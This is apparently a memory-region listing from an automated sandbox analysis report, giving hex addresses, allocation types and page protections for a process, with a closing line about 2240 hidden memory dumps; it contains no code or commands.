page execute and read and write
3E6F000
stack
page read and write
4050000
unkown
page readonly
580000
unkown
page readonly
2D60000
heap
page read and write
222000
direct allocation
page execute and read and write
23B1000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
E0000
unkown
page read and write
3299000
heap
page read and write
23BB000
unkown
page read and write
3B92000
stack
page read and write
2440000
unkown
page read and write
2CB0000
unkown
page readonly
352000
heap
page read and write
36B0000
heap
page read and write
3299000
heap
page read and write
6C1000
heap
page read and write
3870000
unkown
page read and write
4A1A000
heap
page read and write
4BB9000
heap
page read and write
2C90000
unkown
page readonly
C4000
trusted library allocation
page read and write
40D8000
stack
page read and write
624000
heap
page read and write
3E59000
unkown
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
729E000
unkown
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
8340000
unkown
page read and write
3EF9000
trusted library allocation
page read and write
2E18000
heap
page read and write
1F1000
direct allocation
page execute and read and write
513E000
heap
page read and write
669B000
stack
page read and write
3BF0000
unkown
page read and write
384C000
stack
page read and write
2A6000
heap
page read and write
78D0000
unkown
page read and write
263000
heap
page read and write
50C2000
heap
page read and write
222000
direct allocation
page execute and read and write
4B9D000
heap
page read and write
170000
trusted library allocation
page read and write
283E000
trusted library allocation
page read and write
49B0000
trusted library allocation
page read and write
4BDE000
stack
page read and write
3506000
heap
page read and write
4A1E000
stack
page read and write
1F0000
trusted library allocation
page read and write
5F0000
remote allocation
page read and write
2BB0000
unkown
page read and write
32B1000
heap
page read and write
31A000
heap
page read and write
26E0000
unkown
page read and write
51DE000
stack
page read and write
222000
direct allocation
page execute and read and write
270000
trusted library allocation
page read and write
3B90000
stack
page read and write
692000
heap
page read and write
EA000
system
page execute and read and write
660000
heap
page read and write
222000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3D6F000
stack
page read and write
3B0000
trusted library allocation
page read and write
1F0000
heap
page read and write
3980000
unkown
page readonly
26E0000
unkown
page read and write
280000
heap
page read and write
1D6000
heap
page read and write
382B000
stack
page read and write
1F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2AB000
trusted library allocation
page execute and read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
280000
heap
page read and write
2BB0000
unkown
page read and write
270000
trusted library allocation
page read and write
7987000
unkown
page read and write
657D000
stack
page read and write
6C90000
heap
page read and write
28B0000
unkown
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
28B0000
unkown
page read and write
19C000
stack
page read and write
F0000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
4B1E000
stack
page read and write
42F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
32AE000
heap
page read and write
222000
direct allocation
page execute and read and write
A90000
trusted library allocation
page read and write
2C5F000
stack
page read and write
222000
direct allocation
page execute and read and write
F0000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
32AE000
heap
page read and write
97000
stack
page read and write
32B8000
heap
page read and write
2A3D000
stack
page read and write
1C4000
heap
page read and write
25D2000
trusted library allocation
page read and write
210000
heap
page read and write
2440000
unkown
page read and write
222000
direct allocation
page execute and read and write
350F000
heap
page read and write
170000
trusted library allocation
page read and write
32B6000
heap
page read and write
41FC000
stack
page read and write
4A9C000
heap
page read and write
270000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2C7000
heap
page read and write
3C70000
unkown
page readonly
682F000
stack
page read and write
32B1000
heap
page read and write
4630000
unkown
page read and write
222000
direct allocation
page execute and read and write
32C8000
heap
page read and write
2576000
trusted library allocation
page read and write
8240000
unkown
page read and write
32B6000
heap
page read and write
4A08000
heap
page read and write
2D99000
heap
page read and write
69BB000
stack
page read and write
2E70000
heap
page read and write
23DB000
unkown
page read and write
10000
heap
page read and write
720000
unkown
page readonly
2440000
unkown
page read and write
1F0000
trusted library allocation
page read and write
2AC0000
stack
page read and write
4260000
trusted library allocation
page read and write
A00000
trusted library allocation
page read and write
3430000
heap
page read and write
70000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
4B1C000
heap
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
3760000
unkown
page read and write
222000
direct allocation
page execute and read and write
27BC000
trusted library allocation
page read and write
23DB000
unkown
page read and write
2BB0000
unkown
page read and write
2440000
unkown
page read and write
61000
system
page execute and read and write
3800000
heap
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
2D70000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3299000
heap
page read and write
1F0000
trusted library allocation
page read and write
1A3000
trusted library allocation
page execute and read and write
24A1000
unkown
page read and write
47F9000
stack
page read and write
222000
direct allocation
page execute and read and write
9CD1000
trusted library allocation
page read and write
79A5000
unkown
page read and write
2D8D000
heap
page read and write
23E0000
unkown
page readonly
2BB0000
unkown
page read and write
310000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
50E1000
heap
page read and write
222000
direct allocation
page execute and read and write
ACD1000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
1CFA000
unkown
page read and write
F2DE000
trusted library allocation
page read and write
492B000
stack
page read and write
2E14000
heap
page read and write
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
32B1000
heap
page read and write
26E0000
unkown
page read and write
32B1000
heap
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
410000
heap
page read and write
A7E000
stack
page read and write
3FAF000
stack
page read and write
170000
trusted library allocation
page read and write
19C000
stack
page read and write
2D95000
heap
page read and write
41E0000
trusted library allocation
page read and write
81000
system
page execute and read and write
170000
trusted library allocation
page read and write
2440000
unkown
page read and write
34ED000
heap
page read and write
6E00000
heap
page read and write
1F1000
direct allocation
page execute and read and write
212E000
stack
page read and write
2F0B000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
38F0000
heap
page read and write
300000
heap
page read and write
2380000
unkown
page read and write
2BB0000
unkown
page read and write
32E000
heap
page read and write
450000
trusted library allocation
page read and write
2E24000
heap
page read and write
2BB0000
unkown
page read and write
89000
stack
page read and write
2440000
unkown
page read and write
F0000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
2DC9000
heap
page read and write
1FA000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
6F73000
heap
page read and write
3E0000
heap
page read and write
222000
direct allocation
page execute and read and write
27F0000
unkown
page read and write
2BB0000
unkown
page read and write
3E98000
unkown
page read and write
B30000
heap
page read and write
28B0000
unkown
page read and write
88000
system
page execute and read and write
29F000
heap
page read and write
79A5000
unkown
page read and write
222000
direct allocation
page execute and read and write
3474000
heap
page read and write
1F1000
direct allocation
page execute and read and write
4A01000
heap
page read and write
3485000
heap
page read and write
627000
heap
page read and write
352000
heap
page read and write
70000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
466000
heap
page execute and read and write
6760000
stack
page read and write
2440000
unkown
page read and write
3CC0000
unkown
page read and write
2D99000
heap
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
6699000
stack
page read and write
3F4000
heap
page read and write
4260000
trusted library allocation
page read and write
20000
unkown
page readonly
2BB0000
unkown
page read and write
26F0000
unkown
page read and write
2BB0000
unkown
page read and write
27D000
stack
page read and write
C3000
trusted library allocation
page execute and read and write
82C3000
unkown
page read and write
60EE000
stack
page read and write
1F0000
trusted library allocation
page read and write
1B65000
heap
page read and write
270000
trusted library allocation
page read and write
32B6000
heap
page read and write
222000
direct allocation
page execute and read and write
3ED0000
unkown
page read and write
222000
direct allocation
page execute and read and write
C90000
heap
page read and write
7200000
heap
page read and write
F0000
trusted library allocation
page read and write
1D6000
heap
page read and write
319000
trusted library allocation
page read and write
53C000
stack
page read and write
2AF1000
unkown
page read and write
3C10000
unkown
page read and write
2BB0000
unkown
page read and write
5FA0000
heap
page read and write
10000
heap
page read and write
23FD000
stack
page read and write
1F0000
trusted library allocation
page read and write
6A2000
heap
page read and write
676B000
stack
page read and write
1D10000
unkown
page readonly
450000
trusted library allocation
page execute and read and write
3299000
heap
page read and write
2440000
unkown
page read and write
3507000
heap
page read and write
4658000
unkown
page read and write
2440000
unkown
page read and write
170000
trusted library allocation
page read and write
295E000
stack
page read and write
1A0000
trusted library allocation
page read and write
31D000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
4960000
trusted library allocation
page read and write
73A0000
heap
page read and write
903000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
1BC000
stack
page read and write
10000
heap
page read and write
4CEE000
stack
page read and write
70000
trusted library allocation
page read and write
4A5F000
stack
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
32C3000
heap
page read and write
26F0000
unkown
page read and write
32B1000
heap
page read and write
298000
heap
page read and write
380000
heap
page read and write
234E000
stack
page read and write
32C3000
heap
page read and write
2DBB000
heap
page read and write
285E000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1B60000
heap
page read and write
4200000
unkown
page read and write
6C1000
heap
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
270000
trusted library allocation
page read and write
1BE0000
unkown
page readonly
371F000
heap
page read and write
1D24000
heap
page read and write
1DE000
heap
page read and write
300000
heap
page read and write
281F000
trusted library allocation
page read and write
433C000
stack
page read and write
1B80000
heap
page read and write
49CD000
stack
page read and write
3BB0000
unkown
page read and write
3BD0000
unkown
page read and write
10000
heap
page read and write
382B000
stack
page read and write
705E000
stack
page read and write
170000
trusted library allocation
page read and write
415E000
stack
page read and write
4260000
trusted library allocation
page read and write
657D000
stack
page read and write
88C000
heap
page read and write
1F0000
trusted library allocation
page read and write
100000
heap
page read and write
1E0000
trusted library allocation
page read and write
65FF000
stack
page read and write
226B000
heap
page read and write
3C00000
unkown
page read and write
A70000
heap
page read and write
170000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
2B0000
heap
page read and write
5F0000
remote allocation
page read and write
222000
direct allocation
page execute and read and write
3B2D000
stack
page read and write
1F1000
direct allocation
page execute and read and write
5E7F000
stack
page read and write
6F50000
heap
page read and write
2440000
unkown
page read and write
17C000
stack
page read and write
411C000
stack
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
820000
trusted library allocation
page read and write
32E000
heap
page read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
6E00000
heap
page read and write
43D0000
trusted library allocation
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
38CC000
stack
page read and write
7170000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3C0000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
3E82000
unkown
page read and write
222000
direct allocation
page execute and read and write
433F000
stack
page read and write
28D0000
unkown
page read and write
70000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
86000
system
page execute and read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
70000
trusted library allocation
page read and write
2EE000
heap
page read and write
230000
heap
page execute and read and write
28B0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
4800000
trusted library allocation
page read and write
73C5000
heap
page read and write
26F0000
unkown
page read and write
36AD000
stack
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
2E14000
heap
page read and write
300000
heap
page read and write
2440000
unkown
page read and write
241D000
stack
page read and write
170000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
7970000
unkown
page read and write
300000
unkown
page read and write
4EF9000
heap
page read and write
400000
unkown
page readonly
3299000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1D20000
unkown
page readonly
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
7E0000
heap
page read and write
27DF000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
4EE0000
heap
page read and write
45DE000
stack
page read and write
4F17000
heap
page read and write
2BB0000
unkown
page read and write
2907000
trusted library allocation
page read and write
2440000
unkown
page read and write
4470000
trusted library allocation
page read and write
4A9B000
heap
page read and write
8199000
unkown
page read and write
32B1000
heap
page read and write
692000
heap
page read and write
1A0000
trusted library allocation
page read and write
E1000
system
page execute and read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
C8000
system
page execute and read and write
62B0000
heap
page read and write
3BFF000
stack
page read and write
32B6000
heap
page read and write
2B00000
unkown
page readonly
26E0000
unkown
page read and write
3E7F000
stack
page read and write
2D82000
heap
page read and write
2B0000
unkown
page read and write
64F0000
heap
page read and write
32B8000
heap
page read and write
32AE000
heap
page read and write
2BB0000
unkown
page read and write
446E000
stack
page read and write
2DA6000
heap
page read and write
4050000
unkown
page readonly
2D9E000
heap
page read and write
2820000
unkown
page read and write
2550000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
280000
heap
page read and write
2F0000
heap
page read and write
170000
trusted library allocation
page read and write
1DBF000
stack
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
5DEE000
stack
page read and write | page guard
32C3000
heap
page read and write
3299000
heap
page read and write
32B1000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
170000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
5F8000
heap
page read and write
2F0000
heap
page read and write
B6D1000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
88E000
heap
page read and write
2D7E000
heap
page read and write
222000
direct allocation
page execute and read and write
6C1000
heap
page read and write
511E000
heap
page read and write
1B83000
heap
page read and write
1A0000
trusted library allocation
page read and write
550000
heap
page read and write
1F1000
direct allocation
page execute and read and write
5ED9000
stack
page read and write
32B6000
heap
page read and write
27F0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
480000
heap
page read and write
C0D1000
trusted library allocation
page read and write
32C3000
heap
page read and write
4F03000
heap
page read and write
3B00000
unkown
page read and write
3D38000
unkown
page read and write
26E0000
unkown
page read and write
540000
remote allocation
page read and write
640000
heap
page read and write
32AE000
heap
page read and write
1F1000
direct allocation
page execute and read and write
5AC000
heap
page read and write
6D7000
heap
page read and write
2A40000
unkown
page readonly
32B8000
heap
page read and write
3C2D000
stack
page read and write
3F70000
unkown
page execute read
26E0000
unkown
page read and write
21CF000
stack
page read and write
2440000
unkown
page read and write
4ADE000
stack
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2D9E000
heap
page read and write
32B1000
heap
page read and write
3D3F000
stack
page read and write
6F55000
heap
page read and write
2440000
unkown
page read and write
12C000
stack
page read and write
1A0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
32AE000
heap
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
2AC0000
stack
page read and write
2BB0000
unkown
page read and write
32AE000
heap
page read and write
1F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
217F000
stack
page read and write
28B0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
69A000
heap
page read and write
1F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
4800000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3D10000
unkown
page read and write
46BD000
stack
page read and write
6C1000
heap
page read and write
669B000
stack
page read and write
622E000
stack
page read and write
3990000
unkown
page readonly
6220000
heap
page read and write
32AE000
heap
page read and write
6220000
heap
page read and write
818B000
unkown
page read and write
FC000
stack
page read and write
8383000
unkown
page read and write
33CE000
stack
page read and write
1F1000
direct allocation
page execute and read and write
684000
heap
page read and write
2440000
unkown
page read and write
4A1B000
heap
page read and write
4A01000
heap
page read and write
10000
heap
page read and write
11441000
trusted library allocation
page read and write
447000
heap
page read and write
3E82000
unkown
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
31E000
heap
page read and write
26F0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3A80000
unkown
page execute and read and write
47FF000
stack
page read and write
26E0000
unkown
page read and write
2F6000
heap
page read and write
456A000
stack
page read and write
270000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
5AB000
heap
page read and write
26E0000
unkown
page read and write
530000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
21E5000
unkown
page read and write
3541000
trusted library allocation
page read and write
350000
heap
page read and write
6A8000
heap
page read and write
7280000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
284000
trusted library allocation
page read and write
39C0000
unkown
page read and write
26E0000
unkown
page read and write
3310000
heap
page read and write
260E000
stack
page read and write
2607000
unkown
page read and write
6C8E000
stack
page read and write
170000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1D42000
heap
page read and write
298000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
21E5000
unkown
page read and write
1A0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2507000
trusted library allocation
page read and write
2440000
unkown
page read and write
6A7000
heap
page read and write
816000
heap
page read and write
1F0000
trusted library allocation
page read and write
7440000
heap
page read and write
8284000
unkown
page read and write
70000
trusted library allocation
page read and write
5080000
heap
page read and write
5CEE000
stack
page read and write
1F0000
trusted library allocation
page read and write
3A0000
trusted library allocation
page execute and read and write
20A000
trusted library allocation
page execute and read and write
32C3000
heap
page read and write
3299000
heap
page read and write
DC000
stack
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
4B9E000
stack
page read and write
5D5E000
stack
page read and write
2190000
heap
page read and write
26E0000
unkown
page read and write
4650000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
4D3E000
stack
page read and write | page guard
2440000
unkown
page read and write
3B92000
stack
page read and write
2BB0000
unkown
page read and write
33E000
heap
page read and write
1C20000
heap
page read and write
2A5000
heap
page read and write
5DA4000
heap
page read and write
3D00000
unkown
page readonly
222000
direct allocation
page execute and read and write
356E000
heap
page read and write
2430000
unkown
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
6CD1000
trusted library allocation
page read and write
10000
heap
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
69F4000
heap
page read and write
5EFE000
stack
page read and write
1D0000
heap
page read and write
5ED9000
stack
page read and write
21C000
stack
page read and write
1F1000
direct allocation
page execute and read and write
818B000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
4F50000
heap
page read and write
2440000
unkown
page read and write
2D90000
heap
page read and write
5050000
heap
page read and write
65B000
heap
page read and write
5E08000
stack
page read and write
356E000
heap
page read and write
3AF0000
unkown
page read and write
26E0000
unkown
page read and write
2C0000
heap
page read and write
26E0000
unkown
page read and write
32AE000
heap
page read and write
222000
direct allocation
page execute and read and write
2C5F000
stack
page read and write
667000
heap
page read and write
F92000
unkown
page execute read
4B5E000
stack
page read and write
2F7000
heap
page read and write
1F1000
direct allocation
page execute and read and write
A10000
trusted library allocation
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
692000
heap
page read and write
82C3000
unkown
page read and write
81C3000
unkown
page read and write
40D8000
stack
page read and write
3EFE000
unkown
page read and write
32B8000
heap
page read and write
There are 2240 hidden memdumps, click here to show them.